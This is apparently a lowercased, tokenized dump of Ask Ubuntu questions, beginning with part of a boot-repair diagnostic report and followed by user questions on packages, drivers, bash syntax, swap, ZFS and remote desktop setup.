c2cc2f46cc2f33d7 ntfs /dev/sdb1 79b97cb3-a4cc-48a6-afae-f0b5f052eec4 ext4 /dev/sdb3 f25855325854f737 ntfs external-ntfs /dev/sdb4 13f706a5-bc41-4060-97c3-d83480b2bf32 ext4 /dev/sdb5 d58b8f4c-a995-433b-a117-7dc0e0335ee5 ext4 /dev/sdb6 faf6195b-ba23-4423-9e04-4a027e4da6a8 ext4 /dev/sdb7 f56eab16-08b1-4f42-b849-5844784cc067 swap /dev/sr0 iso9660 ubuntu 14.04 lts i386 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sdb1 /media/ubuntu/79b97cb3-a4cc-48a6-afae-f0b5f052eec4 ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) /dev/sdb3 /media/ubuntu/external-ntfs fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdb4 /media/ubuntu/13f706a5-bc41-4060-97c3-d83480b2bf32 ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) /dev/sdb5 /media/ubuntu/d58b8f4c-a995-433b-a117-7dc0e0335ee5 ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) /dev/sdb6 /media/ubuntu/faf6195b-ba23-4423-9e04-4a027e4da6a8 ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) ============================= sdb1/grub/grub.cfg : ============================== # do not edit this file # it is automatically generated by grub-mkconfig using templates from /etc/grub.d and settings from /etc/default/grub # begin /etc/grub.d/05_debian_theme set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi end /etc/grub.d/05_debian_theme begin /etc/grub.d/10_linux_proxy function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode end /etc/grub.d/10_linux_proxy begin /etc/grub.d/11_windows_proxy end /etc/grub.d/11_windows_proxy begin /etc/grub.d/40_custom_proxy menuentry `` windows 7 '' { insmod ntfs set root='hd0,2' search -- no-floppy -- fs-uuid -- set 511c-46c3 drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` ubuntu 64-bit '' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-d58b8f4c-a995-433b-a117-7dc0e0335ee5 ' { insmod gzio insmod part_msdos insmod ext2 set root='hd1 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos1 -- hint-efi=hd1 , msdos1 -- hint-baremetal=ahci1 , msdos1 79b97cb3-a4cc-48a6-afae-f0b5f052eec4 else search -- no-floppy -- fs-uuid -- set=root 79b97cb3-a4cc-48a6-afae-f0b5f052eec4 fi linux /vmlinuz-3.13.0-24-generic root=uuid=d58b8f4c-a995-433b-a117-7dc0e0335ee5 ro quiet splash $ vt_handoff initrd /initrd.img-3.13.0-24-generic } menuentry `` ubuntu 32-bit '' { grub_gfxmode=640x480 insmod gzio insmod part_msdos insmod ext2 set root='hd1 , msdos4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos4 -- hint-efi=hd1 , msdos4 -- hint-baremetal=ahci1 , msdos4 13f706a5-bc41-4060-97c3-d83480b2bf32 else search -- no-floppy -- fs-uuid -- set=root 13f706a5-bc41-4060-97c3-d83480b2bf32 fi linux /boot/vmlinuz-3.13.0-24-generic root=uuid=13f706a5-bc41-4060-97c3-d83480b2bf32 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } end /etc/grub.d/40_custom_proxy begin /etc/grub.d/42_linux_xen end /etc/grub.d/42_linux_xen begin /etc/grub.d/43_memtest86+_proxy end /etc/grub.d/43_memtest86+_proxy begin /etc/grub.d/44_os-prober menuentry 'windows 7 ( loader ) ( on /dev/sda1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-1ef3-52b5 ' { insmod part_msdos insmod fat set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 1ef3-52b5 else search -- no-floppy -- fs-uuid -- set=root 1ef3-52b5 fi parttool $ { root } hidden- chainloader +1 } menuentry 'windows 7 ( loader ) ( on /dev/sda2 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-511c-46c3 ' { insmod part_msdos insmod fat set root='hd0 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos2 -- hint-efi=hd0 , msdos2 -- hint-baremetal=ahci0 , msdos2 511c-46c3 else search -- no-floppy -- fs-uuid -- set=root 511c-46c3 fi parttool $ { root } hidden- chainloader +1 } menuentry 'ubuntu 11.10 ( 11.10 ) ( on /dev/sda3 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-simple-7198b994-27cc-432b-878d-7644241bd461 ' { insmod part_msdos insmod ext2 set root='hd0 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos3 -- hint-efi=hd0 , msdos3 -- hint-baremetal=ahci0 , msdos3 7198b994-27cc-432b-878d-7644241bd461 else search -- no-floppy -- fs-uuid -- set=root 7198b994-27cc-432b-878d-7644241bd461 fi linux /vmlinuz root=/dev/sda3 initrd /initrd.img } submenu 'advanced options for ubuntu 11.10 ( 11.10 ) ( on /dev/sda3 ) ' $ menuentry_id_option 'osprober-gnulinux-advanced-7198b994-27cc-432b-878d-7644241bd461 ' { menuentry 'ubuntu 11.10 ( 11.10 ) ( on /dev/sda3 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/vmlinuz -- 7198b994-27cc-432b-878d-7644241bd461 ' { insmod part_msdos insmod ext2 set root='hd0 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos3 -- hint-efi=hd0 , msdos3 -- hint-baremetal=ahci0 , msdos3 7198b994-27cc-432b-878d-7644241bd461 else search -- no-floppy -- fs-uuid -- set=root 7198b994-27cc-432b-878d-7644241bd461 fi linux /vmlinuz root=/dev/sda3 initrd /initrd.img } menuentry 'ubuntu 11.10 ( 11.10 ) ( on /dev/sda3 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/vmlinuz -- 7198b994-27cc-432b-878d-7644241bd461 ' { insmod part_msdos insmod ext2 set root='hd0 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos3 -- hint-efi=hd0 , msdos3 -- hint-baremetal=ahci0 , msdos3 7198b994-27cc-432b-878d-7644241bd461 else search -- no-floppy -- fs-uuid -- set=root 7198b994-27cc-432b-878d-7644241bd461 fi linux /vmlinuz root=/dev/sda3 initrd /initrd.img } menuentry 'ubuntu 11.10 ( 11.10 ) ( on /dev/sda3 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/boot/vmlinuz-3.0.0-13-generic -- 7198b994-27cc-432b-878d-7644241bd461 ' { insmod part_msdos insmod ext2 set root='hd0 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos3 -- hint-efi=hd0 , msdos3 -- hint-baremetal=ahci0 , msdos3 7198b994-27cc-432b-878d-7644241bd461 else search -- no-floppy -- fs-uuid -- set=root 7198b994-27cc-432b-878d-7644241bd461 fi linux /boot/vmlinuz-3.0.0-13-generic root=/dev/sda3 initrd /boot/initrd.img-3.0.0-13-generic } menuentry 'ubuntu 11.10 ( 11.10 ) ( on /dev/sda3 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/vmlinuz -- 7198b994-27cc-432b-878d-7644241bd461 ' { insmod part_msdos insmod ext2 set root='hd0 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos3 -- hint-efi=hd0 , msdos3 -- hint-baremetal=ahci0 , msdos3 7198b994-27cc-432b-878d-7644241bd461 else search -- no-floppy -- fs-uuid -- set=root 7198b994-27cc-432b-878d-7644241bd461 fi linux /vmlinuz root=/dev/sda3 initrd /initrd.img } menuentry 'ubuntu 11.10 ( 11.10 ) ( on /dev/sda3 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/vmlinuz -- 7198b994-27cc-432b-878d-7644241bd461 ' { insmod part_msdos insmod ext2 set root='hd0 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos3 -- hint-efi=hd0 , msdos3 -- hint-baremetal=ahci0 , msdos3 7198b994-27cc-432b-878d-7644241bd461 else search -- no-floppy -- fs-uuid -- set=root 7198b994-27cc-432b-878d-7644241bd461 fi linux /vmlinuz root=/dev/sda3 initrd /initrd.img } } menuentry 'ubuntu 14.04 lts ( 14.04 ) ( on /dev/sdb4 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-simple-13f706a5-bc41-4060-97c3-d83480b2bf32 ' { insmod part_msdos insmod ext2 set root='hd1 , msdos4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos4 -- hint-efi=hd1 , msdos4 -- hint-baremetal=ahci1 , msdos4 13f706a5-bc41-4060-97c3-d83480b2bf32 else search -- no-floppy -- fs-uuid -- set=root 13f706a5-bc41-4060-97c3-d83480b2bf32 fi linux /boot/vmlinuz-3.13.0-24-generic root=uuid=13f706a5-bc41-4060-97c3-d83480b2bf32 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } submenu 'advanced options for ubuntu 14.04 lts ( 14.04 ) ( on /dev/sdb4 ) ' $ menuentry_id_option 'osprober-gnulinux-advanced-13f706a5-bc41-4060-97c3-d83480b2bf32 ' { menuentry 'ubuntu 32-bit ( on /dev/sdb4 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/boot/vmlinuz-3.13.0-24-generic -- 13f706a5-bc41-4060-97c3-d83480b2bf32 ' { insmod part_msdos insmod ext2 set root='hd1 , msdos4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos4 -- hint-efi=hd1 , msdos4 -- hint-baremetal=ahci1 , msdos4 13f706a5-bc41-4060-97c3-d83480b2bf32 else search -- no-floppy -- fs-uuid -- set=root 13f706a5-bc41-4060-97c3-d83480b2bf32 fi linux /boot/vmlinuz-3.13.0-24-generic root=uuid=13f706a5-bc41-4060-97c3-d83480b2bf32 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi end /etc/grub.d/44_os-prober begin /etc/grub.d/45_uefi-firmware end /etc/grub.d/45_uefi-firmware begin /etc/grub.d/46_custom_proxy this file provides an easy way to add custom menu entries . simply type the menu entries you want to add after this comment . be careful not to change the 'exec tail ' line above . end /etc/grub.d/46_custom_proxy begin /etc/grub.d/47_custom if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi end /etc/grub.d/47_custom =================== sdb1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) =============================== sdb5/etc/fstab : ================================ /etc/fstab : static file system information . # use 'blkid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . # / was on /dev/sdb5 during installation uuid=d58b8f4c-a995-433b-a117-7dc0e0335ee5 / ext4 errors=remount-ro 0 1 /boot was on /dev/sdb1 during installation uuid=79b97cb3-a4cc-48a6-afae-f0b5f052eec4 /boot ext4 defaults 0 2 /home was on /dev/sdb6 during installation uuid=faf6195b-ba23-4423-9e04-4a027e4da6a8 /home ext4 defaults 0 2 swap was on /dev/sdb7 during installation uuid=f56eab16-08b1-4f42-b849-5844784cc067 none swap sw 0 0 =========================== sdb4/boot/grub/grub.cfg : =========================== # do not edit this file # it is automatically generated by grub-mkconfig using templates from /etc/grub.d and settings from /etc/default/grub # begin /etc/grub.d/00_header if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } terminal_input console terminal_output console if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=menu set timeout=5 # fallback normal timeout code in case the timeout_style feature is # unavailable . else set timeout=5 fi fi end /etc/grub.d/00_header begin /etc/grub.d/05_debian_theme set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi end /etc/grub.d/05_debian_theme begin /etc/grub.d/20_linux_xen end /etc/grub.d/20_linux_xen begin /etc/grub.d/21_memtest86+_proxy end /etc/grub.d/21_memtest86+_proxy begin /etc/grub.d/30_os-prober_proxy set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi end /etc/grub.d/30_os-prober_proxy begin /etc/grub.d/31_uefi-firmware end /etc/grub.d/31_uefi-firmware begin /etc/grub.d/40_custom_proxy this file provides an easy way to add custom menu entries . simply type the menu entries you want to add after this comment . be careful not to change the 'exec tail ' line above . menuentry `` windows 7 ( 64-bit ) '' { insmod ntfs set root='hd0,2' search -- no-floppy -- fs-uuid -- set 511c-46c3 drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` ubuntu 64-bit '' { grub_gfxmode=640x480 insmod gzio insmod part_msdos insmod ext2 set root='hd1 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos1 -- hint-efi=hd1 , msdos1 -- hint-baremetal=ahci1 , msdos1 79b97cb3-a4cc-48a6-afae-f0b5f052eec4 else search -- no-floppy -- fs-uuid -- set=root 79b97cb3-a4cc-48a6-afae-f0b5f052eec4 fi linux /vmlinuz-3.13.0-24-generic root=uuid=d58b8f4c-a995-433b-a117-7dc0e0335ee5 ro quiet splash $ vt_handoff initrd /initrd.img-3.13.0-24-generic } end /etc/grub.d/40_custom_proxy begin /etc/grub.d/41_linux_proxy function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode end /etc/grub.d/41_linux_proxy begin /etc/grub.d/42_custom_proxy menuentry `` ubuntu 32-bit '' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-13f706a5-bc41-4060-97c3-d83480b2bf32 ' { grub_gfxmode=640x480 insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos4 -- hint-efi=hd1 , msdos4 -- hint-baremetal=ahci1 , msdos4 13f706a5-bc41-4060-97c3-d83480b2bf32 else search -- no-floppy -- fs-uuid -- set=root 13f706a5-bc41-4060-97c3-d83480b2bf32 fi linux /boot/vmlinuz-3.13.0-24-generic root=uuid=13f706a5-bc41-4060-97c3-d83480b2bf32 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } end /etc/grub.d/42_custom_proxy begin /etc/grub.d/43_custom if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/43_custom # # # =============================== sdb4/etc/fstab : ================================ /etc/fstab : static file system information . # use 'blkid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . # / was on /dev/sdb4 during installation uuid=13f706a5-bc41-4060-97c3-d83480b2bf32 / ext4 errors=remount-ro 0 1 swap was on /dev/sdb7 during installation uuid=f56eab16-08b1-4f42-b849-5844784cc067 none swap sw 0 0 =================== sdb4 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sdb2 00000000 05 75 61 1e 60 f3 18 f2 6e d3 9f 7d 7f 75 f6 cb |.ua ... .n.. } .u..| 00000010 5f d5 1f 78 3c 7a 91 f9 6e f7 d9 ac 21 c6 a6 4b |_..x < z..n ... ! ..k| 00000020 f4 53 18 37 f0 92 1f 06 e9 31 8c 77 99 25 99 c2 |.s.7 ... ..1.w. % ..| 00000030 f4 0b 97 07 d2 13 69 b4 06 63 58 c9 4c 56 10 fa | ... ... i..cx.lv..| 00000040 36 ad d7 a6 ad e5 d9 36 9c 3d 7a db 0c 5e e8 03 |6 ... ... 6.=z..^..| 00000050 b2 61 61 41 92 b2 e7 b7 d1 02 28 a6 b3 10 5c 97 |.aaa ... ... ( ... \.| 00000060 52 58 c4 58 26 90 88 1b ee d2 9a 4d 52 90 52 21 |rx.x & ... ... mr.r ! | 00000070 19 ca 90 1a 9a 0f d4 8e 3c 51 89 cd f6 dd b0 2b | ... ... .. < q ... ..+| 00000080 44 e8 ab 8a 95 cf e5 d5 31 73 da 66 9a 3b 8f 07 |d ... ... .1s.f . ; ..| 00000090 e5 de 11 be 76 6a 61 f2 da b9 e4 1f 02 4d e3 a7 | ... .vja ... ... m..| 000000a0 49 51 c0 58 d5 02 fa 5e ed 74 e8 fd cd 4e c7 ef |iq.x ... ^.t ... n..| 000000b0 e1 a3 73 18 d2 12 1f 87 21 7d e2 77 43 e9 39 37 |..s ... .. ! } .wc.97| 000000c0 fa aa 69 cb 87 38 3c 53 ce 73 5d e2 e7 5e 32 66 |..i..8 < s.s ] ..^2f| 000000d0 a7 ac 09 10 ad 08 48 47 13 ac 01 98 09 74 90 34 | ... ... hg ... ..t.4| 000000e0 6b 9e 68 c6 35 36 aa e5 7f 68 41 28 19 40 a5 ed |k.h.56 ... ha ( . @ ..| 000000f0 0f 14 1a ec c8 58 dd 3d 66 7d ce 98 0e ab 70 8d | ... ..x.=f } ... .p.| 00000100 16 cc bf e9 e1 37 22 7c 36 9f 2e 19 84 a0 65 bd | ... ..7 '' |6 ... ..e.| 00000110 34 1b ad ca 6a f5 64 65 36 e9 5a 14 98 6f a0 76 |4 ... j.de6.z..o.v| 00000120 e1 b3 d7 28 ae d4 4f 02 9a c5 53 74 11 93 35 ba | ... ( ..o ... st..5.| 00000130 88 f3 0c f1 d3 4c f3 5c 14 ab 2e 73 06 7b c3 f4 | ... ..l.\ ... s. { ..| 00000140 90 61 e6 e9 d4 92 7a 95 0c 50 d1 0a 60 70 52 3d |.a ... .z..p..pr=| 00000150 64 81 d0 15 41 61 16 01 75 cc 34 88 b5 73 e9 ac |d ... aa..u.4..s..| 00000160 fd e8 d9 9c b7 cb 1a b8 d8 5d a8 24 8f 5a ff 64 | ... ... ... ] . $ .z.d| 00000170 a8 43 6b 92 65 ed 32 bc 73 77 73 ae fc 7e c8 54 |.ck.e.2.sws..~.t| 00000180 c4 a8 57 8d 77 3e 65 d2 5b fd 70 dc 06 ef f7 db |..w.w > e . [ .p ... ..| 00000190 ed 13 fd 6e ef 44 97 fc 38 df 04 a2 bd 18 d5 09 | ... n.d..8 ... ... .| 000001a0 45 bb de a8 81 7a e4 6b f1 f0 1a 7a d7 30 33 8d |e ... .z.k ... z.03.| 000001b0 c1 e4 d1 a6 2e 01 f3 5c 13 6e 2b c2 35 b2 00 ee | ... ... ..n+.5 ... | 000001c0 33 3c 83 fe ff ff 02 00 00 00 00 00 30 04 00 fe |3 < ... ... ... .0 ... | 000001d0 ff ff 05 fe ff ff 02 00 30 04 00 48 87 0b 00 00 | ... ... ..0..h ... .| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 ========= devices which do n't seem to have a corresponding hard drive : ========= sdc =============================== stderr messages : =============================== cat : /tmp/bootinfo-f2q4oqmg/tmp_log : no such file or directory cat : /tmp/bootinfo-f2q4oqmg/tmp_log : no such file or directory no volume groups found
496028	package 'libdconf0 ' has no installation candidate	my system settings do not persist . i have been trying to set system wide proxy settings . but once i set it and if i open the settings dialogue again , the last saved settings vanish . i tried setting it via gsettings ( as i read on some other question here ) . but it returned an error : glib-gio-message : using the 'memory ' gsettings backend . your settings will not be saved or shared with other applications . so , reading some other questions , it seemed that probably libdconf0 is not installed . i tried sudo apt-get install libdconf0 but it returns the error : reading package lists ... done building dependency tree reading state information ... done package libdconf0 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : dconf-service : i386 dconf-gsettings-backend : i386 dconf-service dconf-gsettings-backend e : package 'libdconf0 ' has no installation candidate i tried installing it via http : //apt.ubuntu.com/p/libdconf0 , but it says that pacage libdconf0 is virtual . any help would be appreciated . thanks a lot . edit : i recently installed gnome-shell . i guess this problem of settings not persisting happened after installing gnome-shell . i 'm not sure about this though . it 's just a guess .
496032	having a problem when installation a software on ubuntu 14.04	i have installed ubuntu 14.04 by vm virtualbox on my system . for my work , i wanted to install optimization software on ubuntu . according to instruction of installation , i unpacked and then run command ./configure by terminal . unfortunately , i encountered to this configuration error : ... checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu ./configure : error : sorry ./configure : line 5199 : exit : this : numeric argument required ./configure : line 5199 : exit : this : numeric argument required anyone can help to solve this problem ? the software in question is : realpaver-0.4 , an optimisation software which i downloaded from here and i 'm using the 64-bit version of ubuntu .
496033	what does ! $ means in bash scripting ?	when reading the content of a script , i found something like : echo `` an example '' > ! $ so i wonder what does ! $ mean in bash .
496036	is ubuntu touch available for phones with physical keypads ?	i 'm using nokia x2-01 and want to install ubuntu . can i ? i guess it is the same for a nokia 201 or even a blackberry - will it work ?
496041	how to integrate java web start to chromium ?	i have two types of chromium in ubuntu . one from the software center and another from google site . now i installed the java iced tea from the software center . but the extension work only in firefox . in chrome it stills says 'java ( tm ) is required ' how do i integrate it to both the chromes . i have java-7-openjdk-amd64 .
496043	kubuntu 14.04 - wireless network dissabed by hardware switch	i am trying to install the newest kubuntu 14.04 on my asus u32u , however , i am having problems with `` wireless network dissabled by hardware switch '' . i have tried `` rfkill unblock all '' without any luck , if i use my keyboard to enable/disable wifi using the fn+f2 key for wifi , it gets enabled for a few seconds and then goes back to being disabled . rfkill unblock all shows : phy0 wireless network : soft blocked : no hardware blocked : yes however , if i put the computer to sleep mode , and then wake it again , wifi works .
496046	multiboot not recognizing windows 7 as installed	i 'm trying to install ubuntu onto an old laptop as a second os . i 've successfully done this before but yesterday the drive got corrupted and i lost everything . i 'm in the process of reinstalling the oses i had installed but when i go to install ubuntu , it says there are no recognized install operating systems . i have almost 2/3 of the disk as unallocated space with windows 7 on a 75g partition . what could be wrong ?
496054	what `` $ $ '' outputs in command-line ?	when $ $ typed in terminal , it results in number as follows : $ echo $ $ 2992 so , i want to know what it outputs and what 2992 indicates ?
496060	create swap for ubuntu 14.04 lts	i 'm using 2 gb ram i 've installed ubuntu 14.04 lts how much swap do i need to create ?
496063	graphical pkexec require username and password	i am wondering if there is a way to have the graphical authentication part of pkexec ask for a username as well as a password instead of just a password . the computer i am trying to get set up is on an active directory domain and the domain admins are able to sudo from command line but every time a program prompts for sudo access in the graphical interface it requires the local admin credentials instead of allowing them to use there domain admin credentials ... if this is not possible is there a replacement for pkexec that would allow for this functionality ?
496065	how to mount zfs drive on ubuntu ?	a friend of mine asked me to back up his drive , but its file system is zfs . i would like to know how can i mount that on ubuntu . thanks .
496066	how to get back deleted data using sudo rm -rf	i have deleted folder using sudo rm -rf . how to recover back ? im not able to find it in trash folder
496067	ubuntu server 14.04 : how to keep the state in remote desktop sessions ?	i need to prepare an ubuntu server for concurrent use for 5 users . the idea is using this server from windows 7/8 clients remotely , through `` remote desktop '' -like applications . at this moment i have done the following : installing ubuntu 14.04 lts ( trusty tahr ) in the server computer + gnome3 desktop installing xrdp for the remote sessions installing xfce4 as gui for remote sessions creating users in server and configuring .xsession file to serve xfce4 desktop with this , i can open several windows remote desktop connections , log in to the server and get some basic concurrent working with no problem , but using xfce desktop . however , this is not exactly what i need , because if the remote session is terminated by any reason , the work that has not been saved is lost . my idea was having a remote session , where the state is kept in the server if the connection crashes . like a real ubuntu login ( with gnome , not xfce ) directly to the server , but from windows . we need to run long processes ( lasting hours or days ) and we ca n't lose the state just because the session was terminated . i read that someone tried something similar with vnc , but does not say if it keeps the session state . however , i am having a lot of problems to get vnc server running in my machine ( do n't know yet why , but it is another issue ) , so i ca n't try . so my question is : what are the alternatives to classic windows remote desktop that allow keeping the state ? is it vnc ? is it nx ? any software recommendation for intensive use in terms of performance and efficiency ? am i asking for too much ? : - ) thank you very much for your help !
496072	r128 driver not loaded	i have now successfully installed lubuntu , only to find that something is very wrong with the graphics . glxinfo | grep -i vendor gave me this output : libgl error : dlopen /usr/lib/i386-linux-gnu/dri/r128_dri.so failed ( /usr/lib/i386-linux-gnu/dri/r128_dri.so : can not open shared object file : no such file or directory ) libgl error : dlopen $ { origin } /dri/r128_dri.so failed ( $ { origin } /dri/r128_dri.so : can not open shared object file : no such file or directory ) libgl error : dlopen /usr/lib/dri/r128_dri.so failed ( /usr/lib/dri/r128_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : r128_dri.so libgl error : failed to load driver : r128 server glx vendor string : sgi client glx vendor string : mesa project and sgi opengl vendor string : vmware , inc . the graphics card is an ati rage 128 , so it found that right driver , but is n't loading it . does anyone know where it is , or what is wrong ? xserver-xorg-video-r128 is installed . there is a file /usr/lib/xorg/modules/drivers/r128_drv.so . should i ln -s is to the file it 's looking for ?
496074	problem with my ssh in ubuntu 14 ?	when i tried to connect from my debian to my ubuntu 14 appear this message below what is necessary to do for fix this error ?
496078	ubuntu 14.04lts system-installation screen like watching paint dry	i 've installed 14.04lts but the screen runs ( walks ) exceedingly slowly . i used to run 11.10 which was fine . when i tried upgrading to 12.04 , i ended up with a black screen so i went back to 11.10 . 14.04lts leaves me with what looks like it should run eventually , but currently is painful to use . machine is a desktop probably abut 6year old . processor amd sempron ( tm ) processor 3100+ memory 969mb graphics vesa : 6330 os-type 32-bit - i tried 64 bit but no appreciable difference . when i run lshw -c video i get : * -display unclaimed description : vga compatible controller product : 661/741/760 pci/agp or 662/761gx pcie vga display adapter vendor : silicon integrated systems [ sis ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 66mhz capabilities : pm agp agp-3.0 vga_controller cap_list configuration : latency=0 resources : memory : e8000000-efffffff memory : fbfe0000-fbffffff ioport : c800 ( size=128 ) not sure if this helps identify the problem . mark
496080	how to uninstall ubuntu 14.04 , screenshot of gparted	so i want to uninstall ubuntu 14.04 from my pc as i ca n't log back into windows 8.1 and i have all my programs on that and i really just wan na get rid of ubuntu . please help otherwise i 'm done for d :
496081	which page opened a tab in firefox ?	while searching on well known and reliable pages , i suddenly had a new tab in firefox open with offending content . i closed the page , but it is still visible in the history of firefox . i want to know which site has opened this page . is there a way to get this information ?
496085	installing gnome 3 , should i use gdm or lightdm ?	i 'm currently using xubuntu 14.04 and i wanted to try out gnome 3 , so i started installing it , and during the installation it is asking me what display manager should i use by default : gdm or lightdm . which one should i use ? if i chose one over the other will it affect in any way one of the two desktop environments ( since i wan na keep both xfce and gnome ) ?
